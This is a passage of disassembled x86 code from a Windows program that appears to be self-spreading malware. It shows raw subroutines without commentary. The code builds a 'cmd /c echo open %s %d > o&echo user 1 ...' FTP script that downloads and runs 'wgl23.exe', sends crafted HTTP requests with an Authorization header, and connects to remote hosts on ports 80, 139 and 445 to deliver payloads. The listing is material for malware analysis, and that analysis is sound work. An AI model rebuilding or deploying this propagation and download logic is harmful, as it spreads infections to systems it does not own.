push eax
call sub_40D90F
add esp, 10h
lea ecx, [ebp+var_1C]
mov byte ptr [ebp+var_4], 1
call sub_40DE1C
lea ecx, [ebp+arg_C]
mov esi, eax
call sub_40DE1C
lea esi, [esi+eax+36h]
push esi ; Size
call _malloc
mov edi, eax
pop ecx
test edi, edi
jnz short loc_40DADC
xor bl, bl
jmp short loc_40DB1B
; ---------------------------------------------------------------------------
loc_40DADC: ; CODE XREF: sub_40DA86+50�j
lea ecx, [ebp+var_1C]
call sub_40DE0F
push eax
lea ecx, [ebp+arg_C]
call sub_40DE0F
push eax
push offset aGetHttp1_0Host ; "GET / HTTP/1.0\r\nHost: %s\r\nAuthorization"...
push esi ; Count
push edi ; Dest
call __snprintf
add esp, 14h
push 0
push esi
push edi
push [ebp+arg_0]
call dword_4E4270 ; send
cmp eax, esi
jz short loc_40DB12
xor bl, bl
jmp short loc_40DB14
; ---------------------------------------------------------------------------
loc_40DB12: ; CODE XREF: sub_40DA86+86�j
mov bl, 1
loc_40DB14: ; CODE XREF: sub_40DA86+8A�j
push edi ; Memory
call _free
pop ecx
loc_40DB1B: ; CODE XREF: sub_40DA86+54�j
and byte ptr [ebp+var_4], 0
lea ecx, [ebp+var_1C]
call sub_40DD70
or [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+arg_C]
call sub_40DD70
mov ecx, [ebp+var_C]
pop edi
mov al, bl
pop esi
pop ebx
mov large fs:0, ecx
leave
retn
sub_40DA86 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DB44 proc near ; DATA XREF: .data:0044934C�o
; .data:0044938C�o
Dst = byte ptr -424h
var_423 = byte ptr -423h
Dest = byte ptr -395h
var_24 = dword ptr -24h
var_20 = word ptr -20h
var_1E = word ptr -1Eh
var_1C = dword ptr -1Ch
var_D = byte ptr -0Dh
var_C = dword ptr -0Ch
Src = dword ptr -8
Size = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_A0 = dword ptr 0A8h
arg_A8 = dword ptr 0B0h
push ebp
mov ebp, esp
sub esp, 424h
and [ebp+Dst], 0
push ebx
push esi
push edi
mov ecx, 0FFh
xor eax, eax
lea edi, [ebp+var_423]
push 8Fh ; Size
rep stosd
stosw
stosb
lea eax, [ebp+Dst]
push offset dword_449E58 ; Src
push eax ; Dst
call _memcpy
add esp, 0Ch
mov eax, offset Str ; "wgl23.exe"
push eax
push eax
movzx eax, word ptr dword_4E3F28
push eax
push [ebp+arg_0]
call sub_40AFA9
pop ecx
push eax
push offset aCmdCEchoOpenSD ; "cmd /c echo open %s %d > o&echo user 1 "...
lea eax, [ebp+Dest]
push 400h ; Count
push eax ; Dest
call __snprintf
add eax, 90h
push eax
lea eax, [ebp+Dst]
push eax
push 164h
lea eax, [ebp+Src]
push offset aSvwfbA ; "SVWf"
push eax
call sub_40D36D
xor ebx, ebx
add esp, 30h
cmp [ebp+Size], ebx
jnz short loc_40DBE2
xor eax, eax
jmp loc_40DCF0
; ---------------------------------------------------------------------------
loc_40DBE2: ; CODE XREF: sub_40DB44+95�j
mov [ebp+var_C], ebx
loc_40DBE5: ; CODE XREF: sub_40DB44+183�j
test ebx, ebx
jnz loc_40DCCD
push 6
push 1
push 2
call ds:dword_4F6570 ; socket
mov esi, eax
cmp esi, 0FFFFFFFFh
jz loc_40DCB5
xor eax, eax
lea edi, [ebp+var_1E]
stosd
push [ebp+arg_A0]
stosd
stosd
stosw
mov [ebp+var_20], 2
call dword_4E4220 ; htons
mov [ebp+var_1E], ax
lea eax, [ebp+arg_4]
push eax
call dword_4E4260 ; inet_addr
mov [ebp+var_1C], eax
lea eax, [ebp+var_20]
push 10h
push eax
push esi
call dword_4E41C8 ; connect
cmp eax, 0FFFFFFFFh
jz short loc_40DCAA
cmp [ebp+arg_A0], 50h
jnz short loc_40DC72
sub esp, 10h
lea eax, [ebp+var_D]
mov ecx, esp
mov [ebp+var_24], esp
push eax
lea eax, [ebp+arg_4]
push eax
call sub_40DD4D
push [ebp+Size]
push [ebp+Src]
push esi
call sub_40DA86
add esp, 1Ch
jmp short loc_40DCA7
; ---------------------------------------------------------------------------
loc_40DC72: ; CODE XREF: sub_40DB44+106�j
cmp [ebp+arg_A0], 8Bh
jnz short loc_40DC8C
push [ebp+Size] ; Size
push [ebp+Src] ; Src
push esi ; int
call sub_40D871
jmp short loc_40DCA4
; ---------------------------------------------------------------------------
loc_40DC8C: ; CODE XREF: sub_40DB44+138�j
cmp [ebp+arg_A0], 1BDh
jnz short loc_40DCAA
push [ebp+Size] ; Size
push [ebp+Src] ; Src
push esi ; int
call sub_40D797
loc_40DCA4: ; CODE XREF: sub_40DB44+146�j
add esp, 0Ch
loc_40DCA7: ; CODE XREF: sub_40DB44+12C�j
movzx ebx, al
loc_40DCAA: ; CODE XREF: sub_40DB44+FD�j
; sub_40DB44+152�j
push esi
call dword_4E42B8 ; closesocket
test ebx, ebx
jnz short loc_40DCC0
loc_40DCB5: ; CODE XREF: sub_40DB44+BA�j
push 3E8h
call ds:dword_4F6380 ; Sleep
loc_40DCC0: ; CODE XREF: sub_40DB44+16F�j
inc [ebp+var_C]
cmp [ebp+var_C], 2
jl loc_40DBE5
loc_40DCCD: ; CODE XREF: sub_40DB44+A3�j
lea ecx, [ebp+Src]
call sub_40D192
test ebx, ebx
jz short loc_40DCEE
mov eax, [ebp+arg_A8]
shl eax, 6
inc dword_449250[eax]
lea eax, dword_449250[eax]
loc_40DCEE: ; CODE XREF: sub_40DB44+193�j
mov eax, ebx
loc_40DCF0: ; CODE XREF: sub_40DB44+99�j
pop edi
pop esi
pop ebx
leave
retn
sub_40DB44 endp
; =============== S U B R O U T I N E =======================================
sub_40DCF5 proc near ; DATA XREF: .data:00440008�o
call sub_40E2EC
jmp $+5
push offset nullsub_1 ; void (__cdecl *)()
call _atexit
pop ecx
retn
sub_40DCF5 endp
; =============== S U B R O U T I N E =======================================
sub_40DD0B proc near ; CODE XREF: sub_40D90F+1B�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
push esi
mov esi, ecx
push 0
mov al, [eax]
mov [esi], al
call sub_40E08D
mov eax, esi
pop esi
retn 4
sub_40DD0B endp
; =============== S U B R O U T I N E =======================================
sub_40DD23 proc near ; CODE XREF: sub_40D90F+152�p
; sub_43B410+3C�p ...
arg_0 = dword ptr 4
push esi
push edi
mov edi, [esp+8+arg_0]
mov esi, ecx
push 0
mov al, [edi]
mov [esi], al
call sub_40E08D
push ds:dword_43D478
mov ecx, esi
push 0
push edi
call sub_40DE9E
mov eax, esi
pop edi
pop esi
retn 4
sub_40DD23 endp
; =============== S U B R O U T I N E =======================================
sub_40DD4D proc near ; CODE XREF: sub_40DB44+118�p
; sub_43B3B0+27�p ...
Str = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
push esi
mov esi, ecx
push 0
mov al, [eax]
mov [esi], al
call sub_40E08D
push [esp+4+Str] ; Str
mov ecx, esi
call sub_40DF94
mov eax, esi
pop esi
retn 8
sub_40DD4D endp
; =============== S U B R O U T I N E =======================================
sub_40DD70 proc near ; CODE XREF: sub_40D90F+161�p
; sub_40DA86+9C�p ...
push 1
call sub_40E08D
retn
sub_40DD70 endp
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_40DD78(char *Str)
sub_40DD78 proc near ; CODE XREF: sub_40D90F+11E�p
Src = dword ptr 4
push esi
mov esi, ecx
push [esp+4+Src] ; Str
call sub_40DD95
pop ecx
push eax ; Size
mov ecx, esi
push [esp+8+Src] ; Src
call sub_40DE34
pop esi
retn 4
sub_40DD78 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40DD95(char *Str)
sub_40DD95 proc near ; CODE XREF: sub_40DD78+7�p
; sub_40DF94+7�p
Str = dword ptr 4
push [esp+Str] ; Str
call _strlen
pop ecx
retn
sub_40DD95 endp
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_40DDA0(size_t Size,int)
sub_40DDA0 proc near ; CODE XREF: sub_40D90F+107�p
; sub_40D90F+138�p
Size = dword ptr 4
arg_4 = dword ptr 8
mov eax, ds:dword_43D478
push ebx
mov ebx, [esp+4+Size]
push esi
mov esi, ecx
push edi
sub eax, [esi+8]
cmp eax, ebx
ja short loc_40DDBA
call sub_43B3B0
loc_40DDBA: ; CODE XREF: sub_40DDA0+13�j
test ebx, ebx
jbe short loc_40DDEE
mov edi, ebx
push 0
add edi, [esi+8]
mov ecx, esi
push edi
call sub_40DFE1
test al, al
jz short loc_40DDEE
lea eax, [esp+0Ch+arg_4]
push eax ; int
mov eax, [esi+4]
add eax, [esi+8]
push ebx ; Size
push eax ; Dst
call sub_40DDF6
add esp, 0Ch
mov ecx, esi
push edi
call sub_40DFB1
loc_40DDEE: ; CODE XREF: sub_40DDA0+1C�j
; sub_40DDA0+2F�j
mov eax, esi
pop edi
pop esi
pop ebx
retn 8
sub_40DDA0 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40DDF6(void *Dst,size_t Size,int)
sub_40DDF6 proc near ; CODE XREF: sub_40DDA0+3E�p
Dst = dword ptr 4
Size = dword ptr 8
arg_8 = dword ptr 0Ch
mov eax, [esp+arg_8]
push [esp+Size] ; Size
movsx eax, byte ptr [eax]
push eax ; Val
push [esp+8+Dst] ; Dst
call _memset
add esp, 0Ch
retn
sub_40DDF6 endp
; =============== S U B R O U T I N E =======================================
sub_40DE0F proc near ; CODE XREF: sub_40DA86+59�p
; sub_40DA86+62�p ...
mov eax, [ecx+4]
test eax, eax
jnz short locret_40DE1B
call sub_40E087
locret_40DE1B: ; CODE XREF: sub_40DE0F+5�j
retn
sub_40DE0F endp
; =============== S U B R O U T I N E =======================================
sub_40DE1C proc near ; CODE XREF: sub_40DA86+32�p
; sub_40DA86+3C�p
mov eax, [ecx+8]
retn
sub_40DE1C endp
; =============== S U B R O U T I N E =======================================
sub_40DE20 proc near ; CODE XREF: sub_40D90F+33�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
cmp [ecx+0Ch], eax
jnb short locret_40DE31
push 0
push eax
call sub_40DFE1
locret_40DE31: ; CODE XREF: sub_40DE20+7�j
retn 4
sub_40DE20 endp
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_40DE34(void *Src,size_t Size)
sub_40DE34 proc near ; CODE XREF: sub_40DD78+14�p
Src = dword ptr 4
Size = dword ptr 8
mov eax, ds:dword_43D478
push ebx
mov ebx, [esp+4+Size]
push esi
mov esi, ecx
push edi
sub eax, [esi+8]
cmp eax, ebx
ja short loc_40DE4E
call sub_43B3B0
loc_40DE4E: ; CODE XREF: sub_40DE34+13�j
test ebx, ebx
jbe short loc_40DE81
mov edi, ebx
push 0
add edi, [esi+8]
mov ecx, esi
push edi
call sub_40DFE1
test al, al
jz short loc_40DE81
mov eax, [esi+4]
push ebx ; Size
push [esp+10h+Src] ; Src
add eax, [esi+8]
push eax ; Dst
call sub_40DE89
add esp, 0Ch
mov ecx, esi
push edi
call sub_40DFB1
loc_40DE81: ; CODE XREF: sub_40DE34+1C�j
; sub_40DE34+2F�j
mov eax, esi
pop edi
pop esi
pop ebx
retn 8
sub_40DE34 endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40DE89(void *Dst,void *Src,size_t Size)
sub_40DE89 proc near ; CODE XREF: sub_40DE34+3D�p
; sub_40DE9E+D9�p ...
Dst = dword ptr 4
Src = dword ptr 8
Size = dword ptr 0Ch
push [esp+Size] ; Size
push [esp+4+Src] ; Src
push [esp+8+Dst] ; Dst
call _memcpy
add esp, 0Ch
retn
sub_40DE89 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DE9E proc near ; CODE XREF: sub_40DD23+1E�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push ebx
mov ebx, [ebp+arg_0]
push esi
mov esi, ecx
push edi
mov ecx, ebx
call sub_40DF90
cmp eax, [ebp+arg_4]
jnb short loc_40DEBA
call sub_43B6B0
loc_40DEBA: ; CODE XREF: sub_40DE9E+15�j
mov ecx, ebx
call sub_40DF90
mov edi, eax
mov eax, [ebp+arg_4]
sub edi, eax
cmp [ebp+arg_8], edi
jnb short loc_40DED0
mov edi, [ebp+arg_8]
loc_40DED0: ; CODE XREF: sub_40DE9E+2D�j
cmp esi, ebx
jnz short loc_40DEF5
push ds:dword_43D478
add edi, eax
mov ecx, esi
push edi
call sub_40E11D
push [ebp+arg_4]
mov ecx, esi
push 0
call sub_40E11D
jmp loc_40DF87
; ---------------------------------------------------------------------------
loc_40DEF5: ; CODE XREF: sub_40DE9E+34�j
test edi, edi
jbe short loc_40DF5A
mov ecx, ebx
call sub_40DF90
cmp edi, eax
jnz short loc_40DF5A
mov ecx, ebx
call sub_40DE0F
push eax
mov ecx, esi
call sub_40E272
cmp byte ptr [eax], 0FEh
jnb short loc_40DF5A
push ebx
push esi
call sub_40E2D7
pop ecx
test al, al
pop ecx
jz short loc_40DF5A
push 1
mov ecx, esi
call sub_40E08D
mov ecx, ebx
call sub_40DE0F
mov ecx, ebx
mov [esi+4], eax
call sub_40DF90
mov ecx, ebx
mov [esi+8], eax
call sub_40E1A9
push dword ptr [esi+4]
mov ecx, esi
mov [esi+0Ch], eax
call sub_40E272
inc byte ptr [eax]
jmp short loc_40DF87
; ---------------------------------------------------------------------------
loc_40DF5A: ; CODE XREF: sub_40DE9E+59�j
; sub_40DE9E+64�j ...
push 1
push edi
mov ecx, esi
call sub_40DFE1
test al, al
jz short loc_40DF87
push edi ; Size
mov ecx, ebx
call sub_40DE0F
add eax, [ebp+arg_4]
push eax ; Src
push dword ptr [esi+4] ; Dst
call sub_40DE89
add esp, 0Ch
mov ecx, esi
push edi
call sub_40DFB1
loc_40DF87: ; CODE XREF: sub_40DE9E+52�j
; sub_40DE9E+BA�j ...
mov eax, esi
pop edi
pop esi
pop ebx
pop ebp
retn 0Ch
sub_40DE9E endp
; =============== S U B R O U T I N E =======================================
sub_40DF90 proc near ; CODE XREF: sub_40DE9E+D�p
; sub_40DE9E+1E�p ...
mov eax, [ecx+8]
retn
sub_40DF90 endp
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_40DF94(char *Str)
sub_40DF94 proc near ; CODE XREF: sub_40DD4D+18�p
; sub_40E287+34�p
Src = dword ptr 4
push esi
mov esi, ecx
push [esp+4+Src] ; Str
call sub_40DD95
pop ecx
push eax ; Size
mov ecx, esi
push [esp+8+Src] ; Src
call sub_40E0E7
pop esi
retn 4
sub_40DF94 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40DFB1 proc near ; CODE XREF: sub_40DDA0+49�p
; sub_40DE34+48�p ...
var_1 = byte ptr -1
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
and [ebp+var_1], 0
mov [ecx+8], eax
mov ecx, [ecx+4]
lea edx, [ebp+var_1]
add ecx, eax
push edx
push ecx
call sub_40DFD4
pop ecx
pop ecx
leave
retn 4
sub_40DFB1 endp
; =============== S U B R O U T I N E =======================================
sub_40DFD4 proc near ; CODE XREF: sub_40DFB1+18�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_4]
mov ecx, [esp+arg_0]
mov al, [eax]
mov [ecx], al
retn
sub_40DFD4 endp
; =============== S U B R O U T I N E =======================================
sub_40DFE1 proc near ; CODE XREF: sub_40DDA0+28�p
; sub_40DE20+C�p ...
arg_0 = dword ptr 4
arg_4 = byte ptr 8
push ebx
push esi
push edi
mov esi, ecx
call sub_40E197
mov edi, [esp+0Ch+arg_0]
cmp eax, edi
jnb short loc_40DFF8
call sub_43B3B0
loc_40DFF8: ; CODE XREF: sub_40DFE1+10�j
mov eax, [esi+4]
xor ebx, ebx
cmp eax, ebx
jz short loc_40E038
push eax
mov ecx, esi
call sub_40E272
cmp [eax], bl
jz short loc_40E038
push dword ptr [esi+4]
mov ecx, esi
call sub_40E272
cmp byte ptr [eax], 0FFh
jz short loc_40E038
cmp edi, ebx
jnz short loc_40E077
push dword ptr [esi+4]
mov ecx, esi
call sub_40E272
dec byte ptr [eax]
push ebx
loc_40E02D: ; CODE XREF: sub_40DFE1+63�j
mov ecx, esi
call sub_40E08D
loc_40E034: ; CODE XREF: sub_40DFE1+68�j
; sub_40DFE1+72�j
xor al, al
jmp short loc_40E081
; ---------------------------------------------------------------------------
loc_40E038: ; CODE XREF: sub_40DFE1+1E�j
; sub_40DFE1+2A�j ...
cmp edi, ebx
jnz short loc_40E055
cmp [esp+0Ch+arg_4], bl
jz short loc_40E046
push 1
jmp short loc_40E02D
; ---------------------------------------------------------------------------
loc_40E046: ; CODE XREF: sub_40DFE1+5F�j
cmp [esi+4], ebx
jz short loc_40E034
push ebx
mov ecx, esi
call sub_40DFB1
jmp short loc_40E034
; ---------------------------------------------------------------------------
loc_40E055: ; CODE XREF: sub_40DFE1+59�j
cmp [esp+0Ch+arg_4], bl
jz short loc_40E072
mov eax, [esi+0Ch]
cmp eax, 1Fh
ja short loc_40E067
cmp eax, edi
jnb short loc_40E07F
loc_40E067: ; CODE XREF: sub_40DFE1+80�j
push 1
mov ecx, esi
call sub_40E08D
jmp short loc_40E077
; ---------------------------------------------------------------------------
loc_40E072: ; CODE XREF: sub_40DFE1+78�j
cmp [esi+0Ch], edi
jnb short loc_40E07F
loc_40E077: ; CODE XREF: sub_40DFE1+3D�j
; sub_40DFE1+8F�j
push edi
mov ecx, esi
call sub_40E1AD
loc_40E07F: ; CODE XREF: sub_40DFE1+84�j
; sub_40DFE1+94�j
mov al, 1
loc_40E081: ; CODE XREF: sub_40DFE1+55�j
pop edi
pop esi
pop ebx
retn 8
sub_40DFE1 endp
; =============== S U B R O U T I N E =======================================
sub_40E087 proc near ; CODE XREF: sub_40DE0F+7�p
mov eax, offset dword_43D47C
retn
sub_40E087 endp
; =============== S U B R O U T I N E =======================================
sub_40E08D proc near ; CODE XREF: sub_40DD0B+D�p
; sub_40DD23+E�p ...
arg_0 = byte ptr 4
push ebx
xor ebx, ebx
cmp [esp+4+arg_0], bl
push esi
mov esi, ecx
jz short loc_40E0D9
mov eax, [esi+4]
cmp eax, ebx
jz short loc_40E0D9
push eax
call sub_40E272
cmp [eax], bl
jz short loc_40E0C7
push dword ptr [esi+4]
mov ecx, esi
call sub_40E272
cmp byte ptr [eax], 0FFh
jz short loc_40E0C7
push dword ptr [esi+4]
mov ecx, esi
call sub_40E272
dec byte ptr [eax]
jmp short loc_40E0D9
; ---------------------------------------------------------------------------
loc_40E0C7: ; CODE XREF: sub_40E08D+1B�j
; sub_40E08D+2A�j
mov eax, [esi+0Ch]
mov ecx, esi
inc eax
inc eax
push eax
mov eax, [esi+4]
dec eax
push eax
call unknown_libname_32 ; Microsoft VisualC 2-8/net runtime
loc_40E0D9: ; CODE XREF: sub_40E08D+A�j
; sub_40E08D+11�j ...
mov [esi+4], ebx
mov [esi+8], ebx
mov [esi+0Ch], ebx
pop esi
pop ebx
retn 4
sub_40E08D endp
; =============== S U B R O U T I N E =======================================
; int __stdcall sub_40E0E7(void *Src,size_t Size)
sub_40E0E7 proc near ; CODE XREF: sub_40DF94+14�p
Src = dword ptr 4
Size = dword ptr 8
push esi
push 1
push [esp+8+Size]
mov esi, ecx
call sub_40DFE1
test al, al
jz short loc_40E117
push [esp+4+Size] ; Size
push [esp+8+Src] ; Src
push dword ptr [esi+4] ; Dst
call sub_40DE89
add esp, 0Ch
mov ecx, esi
push [esp+4+Size]
call sub_40DFB1
loc_40E117: ; CODE XREF: sub_40E0E7+10�j
mov eax, esi
pop esi
retn 8
sub_40E0E7 endp
; =============== S U B R O U T I N E =======================================
sub_40E11D proc near ; CODE XREF: sub_40DE9E+41�p
; sub_40DE9E+4D�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push ebx
push esi
mov esi, [esp+8+arg_0]
push edi
mov edi, ecx
cmp [edi+8], esi
jnb short loc_40E130
call sub_43B6B0
loc_40E130: ; CODE XREF: sub_40E11D+C�j
mov ecx, edi
call sub_40E287
mov eax, [edi+8]
mov ebx, [esp+0Ch+arg_4]
sub eax, esi
cmp eax, ebx
jnb short loc_40E146
mov ebx, eax
loc_40E146: ; CODE XREF: sub_40E11D+25�j
test ebx, ebx
jbe short loc_40E17A
mov ecx, [edi+4]
sub eax, ebx
add ecx, esi
push eax ; Size
lea eax, [ecx+ebx]
push eax ; Src
push ecx ; Dst
call sub_40E182
mov esi, [edi+8]
add esp, 0Ch
sub esi, ebx
mov ecx, edi
push 0
push esi
call sub_40DFE1
test al, al
jz short loc_40E17A
push esi
mov ecx, edi
call sub_40DFB1
loc_40E17A: ; CODE XREF: sub_40E11D+2B�j
; sub_40E11D+53�j
mov eax, edi
pop edi
pop esi
pop ebx
retn 8
sub_40E11D endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40E182(void *Dst,void *Src,size_t Size)
sub_40E182 proc near ; CODE XREF: sub_40E11D+3A�p
Dst = dword ptr 4
Src = dword ptr 8
Size = dword ptr 0Ch
push [esp+Size] ; Size
push [esp+4+Src] ; Src
push [esp+8+Dst] ; Dst
call _memcpy_0
add esp, 0Ch
retn
sub_40E182 endp
; =============== S U B R O U T I N E =======================================
sub_40E197 proc near ; CODE XREF: sub_40DFE1+5�p
; sub_40E1AD+1E�p
call sub_40E2D3
cmp eax, 2
ja short loc_40E1A5
push 1
pop eax
retn
; ---------------------------------------------------------------------------
loc_40E1A5: ; CODE XREF: sub_40E197+8�j
add eax, 0FFFFFFFEh
retn
sub_40E197 endp
; =============== S U B R O U T I N E =======================================
sub_40E1A9 proc near ; CODE XREF: sub_40DE9E+A6�p
mov eax, [ecx+0Ch]
retn
sub_40E1A9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40E1AD proc near ; CODE XREF: sub_40DFE1+99�p
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
mov eax, offset loc_43C7B4
call __EH_prolog
sub esp, 0Ch
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
mov esi, ecx
mov [ebp+var_10], esp
mov [ebp+var_14], esi
or edi, 1Fh
call sub_40E197
cmp eax, edi
jnb short loc_40E1D7
mov edi, [ebp+arg_0]
loc_40E1D7: ; CODE XREF: sub_40E1AD+25�j
and [ebp+var_4], 0
lea eax, [edi+2]
push 0
push eax
mov ecx, esi
call sub_40E2C3
mov [ebp+arg_0], eax
jmp short loc_40E210
; ---------------------------------------------------------------------------
loc_40E1ED: ; DATA XREF: .rdata:0043F3E4�o
mov eax, [ebp+arg_0]
mov ecx, [ebp+var_14]
mov [ebp+var_18], eax
add eax, 2
push 0
push eax
call sub_40E2C3
mov [ebp+arg_0], eax
mov eax, offset loc_40E20A
retn
; ---------------------------------------------------------------------------
loc_40E20A: ; DATA XREF: sub_40E1AD+57�o
mov esi, [ebp+var_14]
mov edi, [ebp+var_18]
loc_40E210: ; CODE XREF: sub_40E1AD+3E�j
mov eax, [esi+8]
or [ebp+var_4], 0FFFFFFFFh
test eax, eax
jbe short loc_40E232
cmp eax, edi
jbe short loc_40E221
mov eax, edi
loc_40E221: ; CODE XREF: sub_40E1AD+70�j
push eax ; Size
mov eax, [ebp+arg_0]
push dword ptr [esi+4] ; Src
inc eax
push eax ; Dst
call sub_40DE89
add esp, 0Ch
loc_40E232: ; CODE XREF: sub_40E1AD+6C�j
mov ebx, [esi+8]
push 1
mov ecx, esi
call sub_40E08D
mov eax, [ebp+arg_0]
mov ecx, esi
inc eax
push eax
mov [esi+4], eax
call sub_40E272
and byte ptr [eax], 0
cmp ebx, edi
mov [esi+0Ch], edi
ja short loc_40E259
mov edi, ebx
loc_40E259: ; CODE XREF: sub_40E1AD+A8�j
push edi
mov ecx, esi
call sub_40DFB1
mov ecx, [ebp+var_C]
pop edi
pop esi
mov large fs:0, ecx
pop ebx
leave
retn 4
sub_40E1AD endp
; =============== S U B R O U T I N E =======================================
sub_40E272 proc near ; CODE XREF: sub_40DE9E+70�p
; sub_40DE9E+B3�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
dec eax
retn 4
sub_40E272 endp
; [0000000D BYTES: COLLAPSED FUNCTION unknown_libname_32. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
sub_40E287 proc near ; CODE XREF: sub_40E11D+15�p
push esi
mov esi, ecx
mov eax, [esi+4]
test eax, eax
jz short loc_40E2C1
push eax
call sub_40E272
cmp byte ptr [eax], 0
jz short loc_40E2C1
push dword ptr [esi+4]
mov ecx, esi
call sub_40E272
cmp byte ptr [eax], 0FFh
jz short loc_40E2C1
push edi
mov edi, [esi+4]
push 1
mov ecx, esi
call sub_40E08D
push edi ; Str
mov ecx, esi
call sub_40DF94
pop edi
loc_40E2C1: ; CODE XREF: sub_40E287+8�j
; sub_40E287+13�j ...
pop esi
retn
sub_40E287 endp
; =============== S U B R O U T I N E =======================================
sub_40E2C3 proc near ; CODE XREF: sub_40E1AD+36�p
; sub_40E1AD+4F�p
arg_0 = dword ptr 4
push 0
push [esp+4+arg_0]
call sub_40E2DA
pop ecx
pop ecx
retn 8
sub_40E2C3 endp
; =============== S U B R O U T I N E =======================================
sub_40E2D3 proc near ; CODE XREF: sub_40E197�p
or eax, 0FFFFFFFFh
retn
sub_40E2D3 endp
; =============== S U B R O U T I N E =======================================
sub_40E2D7 proc near ; CODE XREF: sub_40DE9E+7C�p
mov al, 1
retn
sub_40E2D7 endp
; =============== S U B R O U T I N E =======================================
sub_40E2DA proc near ; CODE XREF: sub_40E2C3+6�p
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
test eax, eax
jge short loc_40E2E4
xor eax, eax
loc_40E2E4: ; CODE XREF: sub_40E2DA+6�j
push eax ; unsigned int
call ??2@YAPAXI@Z ; operator new(uint)
pop ecx
retn
sub_40E2DA endp
; =============== S U B R O U T I N E =======================================
sub_40E2EC proc near ; CODE XREF: sub_40DCF5�p
; unknown_libname_31+3�p
test byte_4F4B1C, 1
jnz short locret_40E2FC
or byte_4F4B1C, 1
locret_40E2FC: ; CODE XREF: sub_40E2EC+7�j
retn
sub_40E2EC endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40E2FE proc near ; DATA XREF: .data:0044000C�o
jmp $+5
sub_40E2FE endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40E303 proc near
mov eax, dword_44A110
add eax, 6
mov dword_4E6F5C, eax
retn
sub_40E303 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40E311(int,char,int,__int16,int,size_t Size,int,void *Src,void *Memory,int,char)
sub_40E311 proc near ; CODE XREF: sub_40E311+D0�p
; sub_40E3FF+474�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
arg_7 = byte ptr 0Fh
arg_C = word ptr 14h
Size = dword ptr 1Ch
Src = dword ptr 24h
Memory = dword ptr 28h
arg_24 = dword ptr 2Ch
arg_28 = byte ptr 30h
arg_2B = byte ptr 33h
push ebp
mov ebp, esp
push ecx
push ecx
cmp [ebp+arg_28], 0
push ebx
push esi
push edi
jz short loc_40E325
or [ebp+arg_7], 1
jmp short loc_40E329
; ---------------------------------------------------------------------------
loc_40E325: ; CODE XREF: sub_40E311+C�j
and [ebp+arg_7], 0FEh
loc_40E329: ; CODE XREF: sub_40E311+12�j
mov ecx, [ebp+arg_24]
mov ebx, [ebp+Memory]
movzx eax, cx
lea edx, [ebx+18h]
cmp edx, eax
ja short loc_40E34D
or [ebp+arg_7], 2
and [ebp+arg_2B], 0
lea eax, [ebx+18h]
mov [ebp+Size], ebx
mov [ebp+arg_C], ax
jmp short loc_40E35F
; ---------------------------------------------------------------------------
loc_40E34D: ; CODE XREF: sub_40E311+26�j
add eax, 0FFFFFFE8h
and [ebp+arg_7], 0FDh
mov [ebp+arg_C], cx
mov [ebp+Size], eax
mov [ebp+arg_2B], 1
loc_40E35F: ; CODE XREF: sub_40E311+3A�j
movzx eax, [ebp+arg_C]
push eax ; Size
mov [ebp+var_4], eax
call _malloc
test eax, eax
pop ecx
mov [ebp+Memory], eax
jz loc_40E3F8
push 6
lea esi, [ebp+arg_4]
pop ecx
mov edi, eax
rep movsd
mov edi, [ebp+Size]
mov esi, [ebp+Src]
push edi ; Size
add eax, 18h
push esi ; Src
push eax ; Dst
call _memcpy
add esp, 0Ch
lea eax, [ebp+var_8]
push 0
push eax
push [ebp+var_4]
push [ebp+Memory]
push [ebp+arg_0]
call ds:dword_4F63E8 ; WriteFile
test eax, eax
jz short loc_40E3EF
mov eax, [ebp+var_4]
cmp [ebp+var_8], eax
jnz short loc_40E3EF
push [ebp+Memory] ; Memory
call _free
cmp [ebp+arg_2B], 0
pop ecx
jz short loc_40E3EB
push 0 ; char
sub ebx, edi
push [ebp+arg_24] ; int
add edi, esi
lea esi, [ebp+arg_4]
push ebx ; Memory
push edi ; Src
sub esp, 18h
push 6
pop ecx
mov edi, esp
push [ebp+arg_0] ; int
rep movsd
call sub_40E311
add esp, 2Ch
jmp short loc_40E3FA
; ---------------------------------------------------------------------------
loc_40E3EB: ; CODE XREF: sub_40E311+B3�j
mov al, 1
jmp short loc_40E3FA
; ---------------------------------------------------------------------------
loc_40E3EF: ; CODE XREF: sub_40E311+9C�j
; sub_40E311+A4�j
push [ebp+Memory] ; Memory
call _free
pop ecx
loc_40E3F8: ; CODE XREF: sub_40E311+61�j
xor al, al
